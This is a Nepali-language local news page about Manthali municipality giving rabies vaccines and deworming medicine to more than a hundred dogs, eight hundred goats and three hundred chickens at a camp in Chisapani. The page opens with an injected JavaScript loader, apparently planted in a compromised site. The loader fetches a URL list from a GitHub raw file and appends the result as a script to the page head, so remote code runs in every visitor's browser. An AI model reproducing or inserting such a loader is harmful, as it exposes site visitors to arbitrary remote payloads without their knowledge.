;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); चिसापानीमा घरपालुवा पशुपंक्षिलाई खोप,औषधी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • चिसापानीमा घरपालुवा पशुपंक्षिलाई खोप,औषधी
जुनेली बिशेष

चिसापानीमा घरपालुवा पशुपंक्षिलाई खोप,औषधी

चैत्र ०६

रामेछाप । रामेछापको मन्थली नगरपालिकाले घरपालुवा पशुपंक्षीलाई खोप लगाएको छ ।

शुक्रबार नगरपालिकाको पशुशाखाले नगरपालिकाको वडा नं ८ चिसापानीमा एक दिने रेबिज रोग तथा स्थलगत परजिबी नियन्त्रण शिबिरमा संचालन गरि घरपालुवा कुकुर, बाख्रा र कुखुरालाई खोप तथा औषधी दिएको पशुप्राविधिक मुकुन्द कुमार खड्काले जुनेली न्युजलाई जानकारी दिए ।

उनका अनुसार चिसापानीमा संचालन गरिएको सो शिविरमा एक वडा एक जोनोटिक रोग (मान्छेबाट पशुमा- पशुबाट मानिसमा) सर्ने रोगको खोप दिएको हो । जसमा एक सयभन्दा बढी घरपालुवा कुकुरलाई रेबिजको खोप दिएको छ ।

त्यस्तै आठ सयभन्दा बढी बाख्राहरुलाई बोमोर्जिङ् नामक नाम्लेको औषधी दिएको छ । त्यस्तै तीन सय भन्दा बढी कुखुरालाई जुकाको औषधी प्रदान गरिएको छ

फेसबुक प्रतिक्रियाहरु